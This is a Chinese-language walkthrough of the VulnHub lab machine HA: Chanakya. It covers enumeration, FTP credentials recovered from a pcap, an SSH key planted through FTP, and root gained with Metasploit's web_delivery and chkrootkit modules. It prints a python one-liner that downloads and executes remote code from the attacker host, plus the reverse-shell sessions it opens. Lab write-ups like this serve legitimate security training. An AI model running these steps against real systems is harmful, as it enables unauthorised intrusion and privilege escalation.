vulnhub靶机渗透[HA-Chanakya]

Posted on Edited on In Views: Word count in article: 2.9k Reading time ≈ 11 mins.

名称:HA: Chanakya
发布日期:2019年11月9日

下载:

  • Download: https://drive.google.com/file/d/19IyCAe91_EeELwjTFqoZ4_fwHKURNBD4/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/ha/chanakya.zip
  • Download (Torrent): https://download.vulnhub.com/ha/chanakya.zip.torrent

描述:

摧毁王国的策划者又回来了,这次他创造了一个难题,会让你挠头! 是时候面对Chanakya。
您能否解决这个“从根本上启动”并证明自己比较明智?
枚举是关键!!!!

级别:中级

任务:枚举目标计算机并获得root用户访问权限。

信息收集

老规矩上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.130
Host is up (0.00034s latency).
MAC Address: 00:0C:29:BB:CA:D3 (VMware)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@kali:~# nmap -A -sV -Pn -T4 -v --script=vuln 192.168.142.130
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.0.0 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|_      CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283

dirb目录扫一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@kali:~# dirb http://192.168.142.130/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 15 22:27:13 2019
URL_BASE: http://192.168.142.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.142.130/ ----
==> DIRECTORY: http://192.168.142.130/assets/                                                         
==> DIRECTORY: http://192.168.142.130/images/                                                         
+ http://192.168.142.130/index.html (CODE:200|SIZE:2382)                                              
+ http://192.168.142.130/server-status (CODE:403|SIZE:280)

root@kali:~# dirb http://192.168.142.130/ -X .txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 15 22:28:34 2019
URL_BASE: http://192.168.142.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.142.130/ ----
+ http://192.168.142.130/abuse.txt (CODE:200|SIZE:14)

访问该txt文件发现如下内容

1
nfubxn.cpncat

使用rot13.com进行rot13解密,解密出来是ashoka.pcapng,然后访问(http://192.168.142.130/ashoka.pcapng),将此文件下载,然后wireshark打开该文件。

在Wireshark中打开捕获的文件,然后跟随ftp流量的tcp流,并获得ftp的用户名ashoka和密码kautilya。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
220 pyftpdlib based ftpd ready.
USER ashoka
331 Username ok, send password.
PASS kautilya
230 Login successful.
SYST
215 UNIX Type: L8
FEAT
211-Features supported:
 EPRT
 EPSV
 MDTM
 MLST type*;perm*;size*;modify*;unique*;unix.mode;unix.uid;unix.gid;
 REST STREAM
 SIZE
 TVFS
 UTF8
211 End FEAT.
OPTS UTF8 ON
501 Invalid argument.
PWD
257 "/" is the current directory.
TYPE A
200 Type set to: ASCII.
PASV
227 Entering passive mode (192,168,1,101,177,201).
MLSD
150 File status okay. About to open data connection.
226 Transfer complete.

现在有了FTP登录凭据,登录到FTP服务器。 登录后,运行ls命令环顾四周。 发现在根目录中。 因此,决定通过将SSH放置在此位置来完成ssh的操作。 为此,创建一个名为“ .ssh”的目录。 遍历这个新创建的目录后,回到本机终端。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~# ftp 192.168.142.130
Connected to 192.168.142.130.
220 pyftpdlib based ftpd ready.
Name (192.168.142.130:root): ashoka
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-------   1 ashoka   ashoka          1 Nov 05 15:57 .bash_history
-rw-r--r--   1 ashoka   ashoka        220 Nov 05 14:05 .bash_logout
-rw-r--r--   1 ashoka   ashoka       3771 Nov 05 14:05 .bashrc
drwx------   2 ashoka   ashoka       4096 Nov 05 14:18 .cache
drwxrwxr-x   3 ashoka   ashoka       4096 Nov 05 14:26 .local
-rw-r--r--   1 ashoka   ashoka        807 Nov 05 14:05 .profile
226 Transfer complete.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> cd .ssh
250 "/.ssh" is the current directory.

现在该生成一些ssh密钥了。 使用ssh-keygen创建了一些密钥。 输入的密码为“ 123”。 这可以是您选择的任何东西。 将其保留下来以便于记忆。 在创建密钥之后继续前进,进入了本机shell程序的.ssh目录。 在这里,看到了名为“ id_rsa.pub”的密钥。 现在需要将此密钥上传到FTP,因此将is_rsa.pub的内容复制到名为authorized_keys的文件中。

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
root@kali:~/.ssh# ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts
root@kali:~/.ssh# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTIuh8j20bp4uFWWmOn9IXRvRYDVvBjARjPeCZ7o00nnwTzJ/Y1OBU1AoDVNIq6aM/CVJ9qCy0zceqNfC1roGUM+cvUVO+qR5aG+QnT8mxdRnoXin+JAk8nFuynJ63016zuauB0iQUwyQ9dRm+jzW9+J/9S86Fd/qcbKNYbW5wn9Chh3T+bj+T+6RCKlU7q6q+Kc1S4WfI7iXJ6doR9hxD91CRUVWG/KyADbZuWsTuDyxxrQ/KA8ek05owsokgIc9rS8ZjtB23rR1yai/B3hfjjQgKMQkF6k9D7J6Qm07VgDZkYm4RTxlO8bDDnfkNOBs9rzBomPrN2rOeounir4ZIj+dDDpH9tGklDLyCW6RKx8fiN/s9z5Knf61a+9nielEO8DUqaEt+bHTl/3uVimZ01upoLEamclLadpMSBfT6CccUnD2bu4Kcb9kcOjHTW4pQEL9BXSu+upvQDJyRsPxy1JLNZ5xdkJoQKyt5OArNjUq7SsVAOZzNQRaM3JGit9s= root@kali
root@kali:~/.ssh# cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTIuh8j20bp4uFWWmOn9IXRvRYDVvBjARjPeCZ7o00nnwTzJ/Y1OBU1AoDVNIq6aM/CVJ9qCy0zceqNfC1roGUM+cvUVO+qR5aG+QnT8mxdRnoXin+JAk8nFuynJ63016zuauB0iQUwyQ9dRm+jzW9+J/9S86Fd/qcbKNYbW5wn9Chh3T+bj+T+6RCKlU7q6q+Kc1S4WfI7iXJ6doR9hxD91CRUVWG/KyADbZuWsTuDyxxrQ/KA8ek05owsokgIc9rS8ZjtB23rR1yai/B3hfjjQgKMQkF6k9D7J6Qm07VgDZkYm4RTxlO8bDDnfkNOBs9rzBomPrN2rOeounir4ZIj+dDDpH9tGklDLyCW6RKx8fiN/s9z5Knf61a+9nielEO8DUqaEt+bHTl/3uVimZ01upoLEamclLadpMSBfT6CccUnD2bu4Kcb9kcOjHTW4pQEL9BXSu+upvQDJyRsPxy1JLNZ5xdkJoQKyt5OArNjUq7SsVAOZzNQRaM3JGit9s= root@kali
root@kali:~/.ssh# ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts

使用put命令将文件传输到目标计算机

1
2
3
4
5
6
7
8
9
10
11
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
563 bytes sent in 0.00 secs (14.5113 MB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root          563 Dec 16 05:30 authorized_keys
226 Transfer complete.

现在,使用ssh连接到目标计算机。 由于之前放置了授权密钥,因此现在可以登录。 得到了Ashoka用户的shell。 经过一些枚举,看到临时文件中有一个日志文件。 尝试使用cat命令。 看起来像Chkrootkit测试结果日志。 这提示也许可以使用Chkrootkit在此计算机上升级特权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
root@kali:~# ssh ashoka@192.168.142.130
The authenticity of host '192.168.142.130 (192.168.142.130)' can't be established.
ECDSA key fingerprint is SHA256:cuEf1JsbferQL5tQ/iVC9mGMCIALDE5/sX/OJt5LgPQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.130' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 
Enter passphrase for key '/root/.ssh/id_rsa': 
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Tue Nov  5 06:36:00 2019 from 192.168.1.107
ashoka@ubuntu:~$ id
uid=1001(ashoka) gid=1001(ashoka) groups=1001(ashoka)
ashoka@ubuntu:~$ whoami
ashoka
ashoka@ubuntu:~$ cat /tmp/logs
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not found
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not found
Checking `sshd'... not infected
Checking `syslogd'... not tested
Checking `tar'... not infected
Checking `tcpd'... INFECTED
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while... 
/lib/modules/4.15.0-20-generic/vdso/.build-id
/lib/modules/4.15.0-20-generic/vdso/.build-id
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for Suckit rootkit... Warning: /sbin/init INFECTED
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for common ssh-scanners default files... nothing found
Searching for suspect PHP files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... not tested: can't exec 
Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `w55808'... not infected
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
Checking `OSX_RSPLUG'... not infected

提权

现在,要在目标计算机上升级特权,将需要在目标计算机上配备一个meterpreter,并在Metasploit的帮助下使用get root。 使用web_delivery漏洞利用meterpreter。 在use命令的帮助下选择了web_delivery利用,然后提供了lhost。 Lhost是目标计算机(Kali Linux)的IP地址。 将输入漏洞利用代码。 这将创建一个单行脚本,该脚本将使我们对目标计算机有一个meterpreter。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~# msfdb run
[+] Starting database
                                                  
# cowsay++
 ____________                                                                                          
< metasploit >                                                                                         
 ------------                                                                                          
       \   ,__,                                                                                        
        \  (oo)____                                                                                    
           (__)    )\                                                                                  
              ||--|| *                                                                                 
                                                                                                       

       =[ metasploit v5.0.63-dev                          ]
+ -- --=[ 1951 exploits - 1091 auxiliary - 334 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.142.128
LHOST => 192.168.142.128
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.142.128:4444 
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/iG1jsBgk9ZBOAY
[*] Local IP: http://192.168.142.128:8080/iG1jsBgk9ZBOAY
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.142.128:8080/iG1jsBgk9ZBOAY');exec(r.read());"

复制漏洞利用程序生成的命令,并在之前获得的ssh会话运行python -c “import sys;u=import(‘urllib’+{2:’’,3:’.request’}[sys.version_info[0]],fromlist=(‘urlopen’,));r=u.urlopen(‘http://192.168.142.128:8080/iG1jsBgk9ZBOAY');exec(r.read());"。

1
ashoka@ubuntu:~$ python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.142.128:8080/iG1jsBgk9ZBOAY');exec(r.read());"

这给了需要的session。将使用Metasploit中的内置漏洞利用程序,可以帮助我们在目标计算机上获得root shell。 我们选择了会话并为另一个会话提供了端口。 键入漏洞利用程序后,发现漏洞利用程序正在运行,并且通过前面提到的端口为我们提供了另一个shell为了将shell转换为能够用的shell,运行了python单行代码以生成TTY shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
msf5 exploit(multi/script/web_delivery) > 
[*] 192.168.142.130  web_delivery - Delivering Payload (454) bytes
[*] Sending stage (53755 bytes) to 192.168.142.130
[*] Meterpreter session 3 opened (192.168.142.128:4444 -> 192.168.142.130:38970) at 2019-12-16 01:06:52 -0500

msf5 exploit(multi/script/web_delivery) > 
msf5 exploit(multi/script/web_delivery) > use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set session 3
session => 3
msf5 exploit(unix/local/chkrootkit) > set lport 8888
lport => 8888
msf5 exploit(unix/local/chkrootkit) > exploit

[*] Started reverse TCP double handler on 192.168.142.128:8888 
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo XMnVavzOqVIfxgY5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "XMnVavzOqVIfxgY5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.142.128:8888 -> 192.168.142.130:44238) at 2019-12-16 01:09:28 -0500
whoami
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BGwiPjx0EW1uplK3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "BGwiPjx0EW1uplK3\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.142.128:8888 -> 192.168.142.130:44242) at 2019-12-16 01:10:28 -0500
[!] Tried to delete /tmp/update, unknown result
root
python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
whoami
root
# ls
ls
final.txt
# cat final.txt
cat final.txt
                                                                   
!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://in.linkedin.com/in/geet-madan

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________
#

找到一个文本文件final.txt,将其打开以查找final flag,挑战到此结束,6的一批。

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…